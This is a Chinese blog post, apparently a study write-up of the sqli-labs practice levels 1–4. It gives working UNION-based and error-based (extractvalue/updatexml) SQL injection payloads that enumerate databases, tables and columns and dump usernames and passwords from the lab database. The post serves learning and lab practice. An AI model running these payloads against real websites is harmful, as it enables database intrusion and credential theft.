<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>
        likesoso - 随便写写
    </title>
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.1.1"></head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-reply replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            sql注入(一)
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="less1"><a href="#less1" class="headerlink" title="less1"></a>less1</h1><p>单引号报错</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’ LIMIT 0,1’ at line 1</p>
</blockquote>
<p>查看源码，sql语句为：</p>
<p><code>SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1</code></p>
<h2 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;先使用<strong>id=-1</strong>让sql语句前半部分报错，方便执行后面的sql语句</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;用order by 判断有三个字段，回显位为2、3<br><img src="./images/1-1.jpg"></p>
<p>构造payload如下：</p>
<p>爆库：<br><code>?id=-1&#39; union select 1,2,database() -- </code></p>
<p><img src="./images/1-2.jpg"></p>
<p>库名：<strong>security</strong></p>
<p>爆表：</p>
<p><code>?id=-1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -</code></p>
<p><img src="./images/1-3.jpg"></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;可以看到，security库有<strong>emails、referers、uagents、users</strong>四个表，其中我们需要<strong>users</strong>表的内容</p>
<p>爆字段（列名）：<br><code>?id=-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; -- -</code></p>
<p><img src="./images/1-4.jpg"></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;我们发现爆破出了<strong>SER、CURRENT_CONNECTIONS、TOTAL_CONNECTIONS、id、username、password</strong>6个列名，其中只有后面三个才是我们需要的，之所以会出现前三个数据，是因为我们只指定了table_name=’users’。其他的users表名会造成干扰。修改payload：</p>
<p><code>?id=-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; and table_schema = &#39;security&#39;-- -</code></p>
<p><img src="./images/1-5.jpg"></p>
<p>爆值<br><code>?id=-1&#39; union select 1,2,group_concat(username,0x3a,password) from users -- -</code></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;<strong>0x3a</strong>中3a是十进制的58，代表冒号。</p>
<p><img src="./images/1-6.jpg"></p>
<h3 id="小结："><a href="#小结：" class="headerlink" title="小结："></a>小结：</h3><p>&nbsp;&nbsp;&nbsp;&nbsp;先使用order by 和select 1，2，3判断回显位，然后用union查询，配合group_concat函数，使结果显示在一行中。依靠information_schema爆库。这里的id=-1是为了让语句的前半句报错，这样后半句的结果才会被回显出来。</p>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p>&nbsp;&nbsp;&nbsp;&nbsp;判断方式：</p>
<p><code>?id=1&#39; and 1=1 -- - 页面正常</code></p>
<p><code>?id=1&#39; and 1=1 -- - 页面不正常</code></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;我们常见的报错注入大多回用到extractvalue()、updatexml()这两个函数。</p>
<h3 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue"></a>extractvalue</h3><p>函数的格式：<br>EXTRACTVALUE(XML_document, XPath_string);</p>
<p>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</p>
<p>第二个参数：XPath_string (Xpath格式的字符串)</p>
<p>利用点在第二个参数，用concat()将其连接成一个字符串，就不会出现格式的错误，举个例子：</p>
<p>爆库名：<br><code>?id = 1&#39; and extractvalue(1,concat(0x7e,database(),0x7e))</code></p>
<p><img src="./images/1-7.jpg"></p>
<h3 id="updataxml"><a href="#updataxml" class="headerlink" title="updataxml"></a>updataxml</h3><p>UPDATEXML (XML_document, XPath_string, new_value); </p>
<p>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </p>
<p>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 </p>
<p>第三个参数：new_value，String格式，替换查找到的符合条件的数据<br>作用：改变文档中符合条件的节点的值</p>
<p>同样的利用点在第二个参数处，举个例子：</p>
<p>爆库名：<br><code>?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)</code></p>
<p><img src="./images/1-8.jpg"></p>
<h3 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h3><p>爆表名：<br><code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) -- -</code></p>
<p><img src="./images/1-9.jpg"></p>
<p>爆列名：<br><code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; and table_schema = &#39;security&#39;),0x7e)) -- -</code></p>
<p><img src="./images/1-10.jpg"></p>
<p>爆值：<br><code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) -- -</code></p>
<p><img src="./images/1-11.jpg"></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;可以发现并没有完全显示出来，是因为extractvalue能查询的字符串最大长度为32位，超出的部分就显示不出来了，这里我们用substring()函数截取</p>
<p>substring((SQL语句),1,5)</p>
<p><code>?id=1&#39; and extractvalue(1,concat(0x7e,substring((select group_concat(username,0x3a,password) from users),32,64),0x7e)) -- -</code></p>
<p><img src="./images/1-12.jpg"></p>
<p>逐次跑出所有</p>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>union时，id=-1 使语句报错；报错注入时，不要让语句报错。</p>
<h1 id="less2"><a href="#less2" class="headerlink" title="less2"></a>less2</h1><p>单引号报错：</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1</p>
</blockquote>
<p>跟less类似，查看源码可见sql代码如下：<br><code>$sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;</code></p>
<p>判断id没有被’’包起来，所以借用less1的payload去掉单引号即可即可，</p>
<p><img src="./images/1-13.jpg"></p>
<p>#less3<br>单引号报错：</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’) LIMIT 0,1’ at line 1</p>
</blockquote>
<p>判断sql语句中id被括号包了起来，尝试构造：<br><code>?id=1&#39;) and 1=1 -- -    &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//页面正常</code></p>
<p><code>?id=1&#39;) and 1=2 -- -&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//页面不正常</code></p>
<p>源码：<br><code>$sql=&quot;SELECT * FROM users WHERE id=(&#39;$id&#39;) LIMIT 0,1&quot;;</code></p>
<p>构造方法跟less1、less2类似</p>
<p><img src="./images/1-14.jpg"></p>
<h1 id="less4"><a href="#less4" class="headerlink" title="less4"></a>less4</h1><p>单引号不报错，双引号报错。猜测是用的””来包含$id</p>
<blockquote>
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“1””) LIMIT 0,1’ at line 1</p>
</blockquote>
<p>判断用了双引号加括号来包裹id。尝试构造：<br><code>?id=1&quot;) and 1=1 -- -    &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//页面正常</code></p>
<p><code>?id=1&quot;) and 1=2 -- -&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//页面不正常</code></p>
<p>源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$id &#x3D; &#39;&quot;&#39; . $id . &#39;&quot;&#39;;</span><br><span class="line">$sql&#x3D;&quot;SELECT * FROM users WHERE id&#x3D;($id) LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>


<p>payload的构造方法同上</p>

    </div>

    
</div>
    <div class="footer" id="footer">
    <p>Copyright © 2020 <a class="flink" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>-<a class="flink" target="_blank" rel="noopener" href="https://github.com/sanjinhub/hexo-theme-geek">Geek</a>.
        <label class="el-switch el-switch-green el-switch-sm" style="vertical-align: sub;">
            <input type="checkbox" name="switch" id="update_style">
            <span class="el-switch-style"></span>
        </label>
<!--         <script type="text/javascript">
        var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
        document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
        </script> -->
    </p>
</div>
<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="CmCti21ooOOIzFOhEyFkFvR0-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="FqiyUqbg7McKN2eG0MCewupf">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
    color: #698fca;
}

.v .vlist .vcard .vhead .vsys {
    color: #3a3e4a;
}

.v .vlist .vcard .vh .vmeta .vat {
    color: #638fd5;
}

.v .vlist .vcard .vhead .vnick {
    color: #6ba1ff;
}

.v a {
    color: #8696b1;
}

.v .vlist .vcard .vhead .vnick:hover {
    color: #669bfc;
}
</style>
</body>

</html>